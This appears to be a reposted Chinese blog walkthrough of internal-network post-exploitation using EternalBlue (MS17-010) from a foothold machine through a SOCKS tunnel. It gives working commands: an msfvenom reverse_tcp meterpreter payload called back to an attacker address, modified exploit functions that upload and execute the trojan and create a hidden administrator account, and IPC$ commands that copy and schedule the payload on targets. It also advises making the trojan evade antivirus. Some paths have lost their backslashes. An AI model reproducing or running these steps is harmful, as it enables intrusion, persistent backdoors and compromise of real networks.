从永恒之蓝看后渗透_卜八电脑最全问题故障中心

我们今天的故事，从永恒之蓝开始，讲述如何在内网中如何悄无声息的完成一次内网渗透，PTH等章节内容太多，后续跟上……

背景

我们通过跳板成功获得了目标内网的一台机器，发现目标网络拥有健全的防护机制与企业级防护软件，扫描探测和远程登录从暴露的风险角度自然是不被允许的，接下来我们仅借助永恒之蓝完成对内网目标的渗透攻击，只需要跳板机提供的一条socks隧道即可。

首先从轻量级考虑，我们并不会把msf直接接入对方内网，这里推荐下worawit大佬的python版利用工具。

工具地址:https://github.com/worawit/MS17-010

管道探测

我们接下来以一台目标为例，对目标进行poc探测：

python2 checker.py 192.168.154.138

该工具利用基础为管道开放，意味着接下来的exp工作可否顺利开展。

程序执行

接下来对木马做好免杀工作，可以说CS或者其他成熟木马，本处演示方便采用了msf生成的木马：

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.154.159 lport=4444 -f exe -o rabbit.exe

从永恒之蓝看后渗透

变更如下exp函数，免杀处理后发送木马到目标指定目录并执行，这里吐槽一句，网上的攻略多复制粘贴，为什么都带着作者的demo？在C盘下生成一个空文本，好好读读代码，真的没必要：

defsmb_pwn(conn, arch): smbConn = conn.get_smbconnection() smb_send_file(smbConn, '/home/rabbit/rabbit.exe', 'C', '/Users/Public/rabbit.exe') service_exec(conn, r'cmd /c c:\UsersPublic abbit.exe')

python zzz_exploit.py 192.168.154.138

脚本语法是需要管道名称的，如不指定则自动选择，如下上传并执行成功。

这里只是个例子，运行的是什么由你决定，自行替换。

账户控制

同样，使用zzz_exploit.py，函数变更如下新增账户：

defsmb_pwn(conn, arch): service_exec(conn, r'cmd /c net user shadow 1q2w3e4r! /add & net localgroup administrators shadow /add')

IPC$连接

IPC$在内网渗透中的地位一直都是经典，我们在来回顾下基于IPC$的一系列远程操作：

#建立ipc$连接 net use \192.168.15.180ipc$ "1q2w3e4r!" /user:rabbitmask #断开全部连接 net use * /del /y #将目标C盘映射到本地的z盘,渗透测试一定不要做这个 net use z: \IPc$` #把本地文件复制到目标主机的共享目录 copy C:UsersRabbitMaskDesktop abbit.exe \192.168.15.180C$ #查看文件是否存在： dir \192.168.15.180C$ abbit.exe #远程增加定时任务： at \192.168.15.180 21:38:00 C: abbit.exe #取消全部定时任务 at \192.168.15.180 /delete /y #查看当前定时任务 at \192.168.15.180